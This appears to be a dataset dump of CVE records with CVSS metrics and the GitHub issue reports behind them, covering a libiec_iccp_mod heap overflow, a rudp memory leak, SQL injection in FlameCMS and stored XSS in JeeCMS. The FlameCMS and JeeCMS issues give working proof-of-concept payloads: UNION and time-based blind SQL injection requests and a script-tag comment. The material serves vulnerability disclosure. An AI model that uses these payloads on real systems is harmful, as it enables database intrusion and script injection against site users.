[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libiec_iccp_mod_project:libiec_iccp_mod:1.5:*:*:*:*:*:*:*", "matchCriteriaId": "B80FC647-C393-415F-9AA9-B02EA8C954B0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/fcovatti/libiec_iccp_mod/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "fcovatti", "libiec_iccp_mod" ]
Hello, I found a potential heap-buffer-overflow in /libiec_iccp_mod/examples/mms_client_example1/mms_client_example1.c __Below are steps followed to reproduce crash__ Download latest source code from: /fcovatti/libiec_iccp_mod/, compiled with clang and ASAN```export CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address"``` before make __ROW data__: [Uploading crash.zip…]() __ASAN Output__: ``` ==19279==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6280000040fd at pc 0x00000048e36f bp 0x7f fe7f010010 sp 0x7ffe7f00f7c0 WRITE of size 223 at 0x6280000040fd thread T0 #0 0x48e36e in read (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x48e36e) #1 0x57b266 in read /usr/include/x86_64-linux-gnu/bits/unistd.h:44 #2 0x57b266 in Socket_read /root/libiec_iccp_mod/src/hal/socket/linux/socket_linux.c:309 #3 0x5e98cc in ByteStream_readOctets /root/libiec_iccp_mod/src/common/byte_stream.c:108 #4 0x5a128d in addPayloadToBuffer /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:577 #5 0x5a128d in parseIncomingMessage /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:630 #6 0x5a13df in addPayloadToBuffer /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:590 #7 0x5a13df in parseIncomingMessage /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:630 #8 0x5a13df in addPayloadToBuffer /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:590 #9 0x5a13df in parseIncomingMessage /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:630 #10 0x5a35df in addPayloadToBuffer /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:590 #11 0x5a35df in parseIncomingMessage /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:630 #12 0x5a35df in CotpConnection_parseIncomingMessage /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:650 #13 0x522dac in IsoClientConnection_associate /root/libiec_iccp_mod/src/mms/iso_client/impl/iso_client_connection.c:382 #14 0x514885 in MmsConnection_connect /root/libiec_iccp_mod/src/mms/iso_mms/client/mms_client_connection.c:887 #15 0x5113e4 in main /root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1.c:38:6 #16 0x7f9d34dc982f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #17 0x41a1c8 in _start (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x41a1c8) 0x6280000040fd is located 3 bytes to the left of 16100-byte region [0x628000004100,0x628000007fe4) ==19279==AddressSanitizer CHECK failed: /build/llvm-toolchain-5.0-DI81tt/llvm-toolchain-5.0-5.0/projects/compiler-rt/lib/asan/asan_descriptions.cc:178 "((res.trace)) != (0)" (0x0, 0x0) #0 0x4e510f in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x4e510f) #1 0x5011e5 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x5011e5) #2 0x427604 in __asan::HeapAddressDescription::Print() const (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x427604) #3 0x42ae06 in __asan::ErrorGeneric::Print() (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x42ae06) #4 0x4e09bb in __asan::ReportGenericError(unsigned long, unsigned long, unsigned long, unsigned long, bool, unsigned long, unsigned int, bool) [clone .part.11] (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x4e09bb) #5 0x48e38c in read (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x48e38c) #6 0x57b266 in read /usr/include/x86_64-linux-gnu/bits/unistd.h:44 #7 0x57b266 in Socket_read /root/libiec_iccp_mod/src/hal/socket/linux/socket_linux.c:309 #8 0x5e98cc in ByteStream_readOctets /root/libiec_iccp_mod/src/common/byte_stream.c:108 #9 0x5a128d in addPayloadToBuffer /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:577 #10 0x5a128d in parseIncomingMessage /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:630 #11 0x5a13df in addPayloadToBuffer /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:590 #12 0x5a13df in parseIncomingMessage /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:630 #13 0x5a13df in addPayloadToBuffer /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:590 #14 0x5a13df in parseIncomingMessage /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:630 #15 0x5a35df in addPayloadToBuffer /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:590 #16 0x5a35df in parseIncomingMessage /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:630 #17 0x5a35df in CotpConnection_parseIncomingMessage /root/libiec_iccp_mod/src/mms/iso_cotp/cotp.c:650 #18 0x522dac in IsoClientConnection_associate /root/libiec_iccp_mod/src/mms/iso_client/impl/iso_client_connection.c:382 #19 0x514885 in MmsConnection_connect /root/libiec_iccp_mod/src/mms/iso_mms/client/mms_client_connection.c:887 #20 0x5113e4 in main /root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1.c:38:6 #21 0x7f9d34dc982f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #22 0x41a1c8 in _start (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x41a1c8) ```
Heap-buffer-overflow found at mms_client_example1.c
https://api.github.com/repos/fcovatti/libiec_iccp_mod/issues/6/comments
0
2019-10-10T07:02:23Z
2019-10-10T07:02:23Z
https://github.com/fcovatti/libiec_iccp_mod/issues/6
505,077,669
6
2,634
CVE-2020-20663
2021-09-30T17:15:07.527
libiec_iccp_mod v1.5 contains a heap-buffer-overflow in the component mms_client_connection.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fcovatti/libiec_iccp_mod/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fcovatti/libiec_iccp_mod/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libiec_iccp_mod_project:libiec_iccp_mod:1.5:*:*:*:*:*:*:*", "matchCriteriaId": "B80FC647-C393-415F-9AA9-B02EA8C954B0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/fcovatti/libiec_iccp_mod/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "fcovatti", "libiec_iccp_mod" ]
Hello, I found a potential heap-buffer-overflow in /libiec_iccp_mod/examples/mms_client_example1/mms_client_example1.c, but unable to locate the trace code, however the deeper cause is found in: /root/libiec_iccp_mod/src/mms/iso_mms/client/mms_client_connection.c:790 when the program try to calloc a large spcae, caused the heap-buffer-overflow. __Below are steps followed to reproduce crash__ Download latest source code from: /fcovatti/libiec_iccp_mod/, compiled with clang and ASAN```export CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address"```before make __Row data__ [crash.zip](https://github.com/fcovatti/libiec_iccp_mod/files/3710368/crash.zip) ### ASAN Output: ``` ================================================================= ==23235==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6280000040ff at pc 0x00000048e36f bp 0x7ffef31f51d0 sp 0x7ffef31f4980 WRITE of size 127 at 0x6280000040ff thread T0 #12 0x7fecd633e82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #13 0x41a1c8 in _start (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x41a1c8) 0x6280000040ff is located 1 bytes to the left of 16100-byte region [0x628000004100,0x628000007fe4) allocated by thread T0 here: #0 0x4daee0 in calloc (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x4daee0) #1 0x51443c in MmsConnection_create /root/libiec_iccp_mod/src/mms/iso_mms/client/mms_client_connection.c:790 #2 0x7fecd633e82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/temp/iec/libiec_iccp_mod/examples/mms_client_example1/mms_client_example1+0x48e36e) in read Shadow bytes around the buggy address: 0x0c507fff87c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c507fff87d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c507fff87e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c507fff87f0: 00 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa 0x0c507fff8800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c507fff8810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0 x0c507fff8820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c507fff8830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c507fff8850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c507fff8860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==23235==ABORTING ```
Heap-buffer-overflow found at mms_client_example1.c different from issues 6
https://api.github.com/repos/fcovatti/libiec_iccp_mod/issues/7/comments
0
2019-10-10T07:08:43Z
2019-10-10T07:08:43Z
https://github.com/fcovatti/libiec_iccp_mod/issues/7
505,080,356
7
2,635
CVE-2020-20665
2021-09-30T17:15:07.617
rudp v0.6 was discovered to contain a memory leak in the component main.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/401.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cloudwu/rudp/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/401.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cloudwu/rudp/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rudp_project:rudp:0.6:*:*:*:*:*:*:*", "matchCriteriaId": "A947EC7D-6EFF-4932-BA87-D70CC425A91F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/cloudwu/rudp/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cloudwu", "rudp" ]
Hello, I found a __MEMORY LEAK__ in main.c:90 __Below are steps followed to reproduce crash__ Download latest source code from: https://github.com/cloudwu/rudp, compiled with clang and ASAN```export CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address"```before make __ASAN Output__ ``` ================================================================= ==25482==ERROR: LeakSanitizer: detected memory leaks Direct leak of 120 byte(s) in 1 object(s) allocated from: #0 0x4b8818 (/root/temp/ICS/rudp/rudp+0x4b8818) #1 0x4e9d94 (/root/temp/ICS/rudp/rudp+0x4e9d94) SUMMARY: AddressSanitizer: 120 byte(s) leaked in 1 allocation(s). ``` it seems that you have a double free issue.
Memory leak found at main.c:90
https://api.github.com/repos/cloudwu/rudp/issues/6/comments
2
2019-11-06T08:21:48Z
2019-11-07T03:05:59Z
https://github.com/cloudwu/rudp/issues/6
518,312,732
6
2,636
CVE-2020-20796
2021-09-30T22:15:08.060
FlameCMS 3.3.5 contains a SQL injection vulnerability in /master/article.php via the "Id" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FlameNET/FlameCMS/issues/24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FlameNET/FlameCMS/issues/24" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flamecms_project:flamecms:3.3.5:*:*:*:*:*:*:*", "matchCriteriaId": "FB1459AC-54D9-43FB-B2C5-87FB9B428541", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/FlameNET/FlameCMS/issues/24
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FlameNET", "FlameCMS" ]
hello There is a sql injection vulnerability here: FlameCMS-master/article.php <img width="748" alt="image" src="https://user-images.githubusercontent.com/23147261/66939882-80401000-f076-11e9-83dd-34efd426b518.png"> http://127.0.0.1:8888/FlameCMS-master/article?id=1 <img width="713" alt="image" src="https://user-images.githubusercontent.com/23147261/66940438-871b5280-f077-11e9-925d-9293c757740e.png"> payload: id=-3521' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766271,0x7849574d434964786d6d53677a775679504d4e506c7563456d516b75474f634652545662506a5073,0x71767a6271),NULL,NULL-- auYF
sql injection vulnerability
https://api.github.com/repos/FlameNET/FlameCMS/issues/24/comments
4
2019-10-16T16:47:47Z
2019-10-17T12:07:37Z
https://github.com/FlameNET/FlameCMS/issues/24
507,970,202
24
2,637
CVE-2020-20797
2021-09-30T22:15:08.153
FlameCMS 3.3.5 contains a time-based blind SQL injection vulnerability in /account/register.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FlameNET/FlameCMS/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FlameNET/FlameCMS/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flamecms_project:flamecms:3.3.5:*:*:*:*:*:*:*", "matchCriteriaId": "FB1459AC-54D9-43FB-B2C5-87FB9B428541", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/FlameNET/FlameCMS/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FlameNET", "FlameCMS" ]
Hello There is a Time-based blind injection vulnerability here too: FlameCMS-master/account/register.php <img width="759" alt="image" src="https://user-images.githubusercontent.com/23147261/66999201-238d3580-f108-11e9-8109-2f3e805383b4.png"> <img width="1221" alt="image" src="https://user-images.githubusercontent.com/23147261/66998000-0a838500-f106-11e9-8a5a-e8bacc10f6e5.png"> poc : POST /FlameCMS-master/account/register?XDEBUG_SESSION_START=16052 HTTP/1.1 Host: 127.0.0.1:8888 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Content-Length: 379 Connection: close Referer: http://127.0.0.1:8888/FlameCMS-master/account/register?XDEBUG_SESSION_START=19560 Cookie: bdshare_firstime=1521359417238; _ga=GA1.1.1769867541.1569134195; mprtcl-v4_CCA8AE13={'gs':{'ie':1|'dt':'719f10ea1d9f664eab8238c61651c212'|'cgid':'319bce97-c8d8-46c5-8392-475ba6458c8a'|'das':'52a59f82-afe9-4f23-a231-edd8a11fc7d1'}|'l':0|'2092622027007090544':{'fst':1569134198283}|'cu':'2092622027007090544'}; PHPSESSID=dc9b176c866392458b9562d3ff8f6840; XDEBUG_SESSION=16052 Upgrade-Insecure-Requests: 1 csrftoken=6d42030c-2ad6-4fa2-b3be-0ba74e5aa7aa&country=CRItest',concat('test',(select sleep(if(length(user())>1,1,0)))),'333');#&ret=&sourceType=&dobMonth=1&dobDay=1&dobYear=2015&firstname=11111&lastname=11111&emailAddress=431%4011.com&emailAddressConfirmation=431%4011.com&password=11111&rePassword=11111&question1=19&answer1=bmw&agreedToChatPolicy=true&agreedToToU=true&submit Time based injection and need to write the new emailAddress everytime to test <img width="1313" alt="image" src="https://user-images.githubusercontent.com/23147261/66998393-c0e76a00-f106-11e9-8a85-9a5ed5d01695.png"> <img width="1281" alt="image" src="https://user-images.githubusercontent.com/23147261/66998776-6995c980-f107-11e9-9e17-9099946b36cf.png"> <img width="1437" alt="image" src="https://user-images.githubusercontent.com/23147261/66999078-efb21000-f107-11e9-8d73-420638f7cbaf.png">
sql injection vulnerability (2)
https://api.github.com/repos/FlameNET/FlameCMS/issues/26/comments
2
2019-10-17T10:02:26Z
2019-10-17T12:10:59Z
https://github.com/FlameNET/FlameCMS/issues/26
508,369,299
26
2,638
CVE-2020-20799
2021-09-30T22:15:08.237
JeeCMS 1.0.1 contains a stored cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the commentText parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blackjliuyun/cvetest/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blackjliuyun/cvetest/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecms:jeecms:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "6500D16D-4485-4006-9CC5-9E7EE14F2B40", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/blackjliuyun/cvetest/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blackjliuyun", "cvetest" ]
product: jeecms (http://www.jeecms.com) version: X1.0.1 There is a storage type of xss, which is triggered in the foreground after the user submits the comment and the background audit is passed. poc: POST /usercomment HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/json JEECMS-Auth-Token: eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJzeXN0ZW0iLCJjcmVhdGVkIjoxNTc0MDk1MzI2Njg1LCJ1c2VyU291cmNlIjoiYWRtaW4iLCJleHAiOjE1NzQxMTI1MjZ9.t6GRCTMO1Kc7w-5An7VVq3dKRrncURML6Gj6sWXK-B7gK0njyOigV-887ehbeaScT8mW7GiGr1lvMBlryPteVg Redirect-Header: false X-Requested-With: XMLHttpRequest Content-Length: 97 Connection: close Referer: http://127.0.0.1:8080/sssd/3134 Cookie: bdshare_firstime=1521359417238; _ga=GA1.1.1769867541.1569134195; mprtcl-v4_CCA8AE13={'gs':{'ie':1|'dt':'719f10ea1d9f664eab8238c61651c212'|'cgid':'319bce97-c8d8-46c5-8392-475ba6458c8a'|'das':'52a59f82-afe9-4f23-a231-edd8a11fc7d1'}|'l':0|'2092622027007090544':{'fst':1569134198283}|'cu':'2092622027007090544'}; zh_choose=s; JSESSIONID=1B449846D380486CCCBCD9533F493A32; JIDENTITY=be57c366-f702-4d76-8b0e-df326070cdd9; rememberMe=d3dnQzJJS3c3THpBVDlyJTJCanVYcHF3JTNEJTNEOnc5Q2xXYWw4UndyUDhJa1BNZUEzcHclM0QlM0Q; _site_id_cookie=1 {"contentId":"3134","commentText":"<script>alert('1')</script>","parentId":"","userCommentId":""} <img width="1389" alt="image" src="https://user-images.githubusercontent.com/23147261/69112545-75d0c600-0abb-11ea-9780-d92d8977c060.png"> <img width="1144" alt="image" src="https://user-images.githubusercontent.com/23147261/69112614-9d279300-0abb-11ea-9492-08b70638d51d.png"> <img width="701" alt="image" src="https://user-images.githubusercontent.com/23147261/69112710-ebd52d00-0abb-11ea-8ebf-58961c1ba39a.png">
jeecms commentary exists storage type xss
https://api.github.com/repos/blackjliuyun/cvetest/issues/1/comments
0
2019-11-19T05:08:06Z
2019-11-19T05:08:06Z
https://github.com/blackjliuyun/cvetest/issues/1
524,777,593
1
2,639
CVE-2021-3747
2021-10-01T03:15:07.103
The MacOS version of Multipass, version 1.7.0, fixed in 1.7.2, accidentally installed the application directory with incorrect owner.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2, "impactScore": 6, "source": "security@ubuntu.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
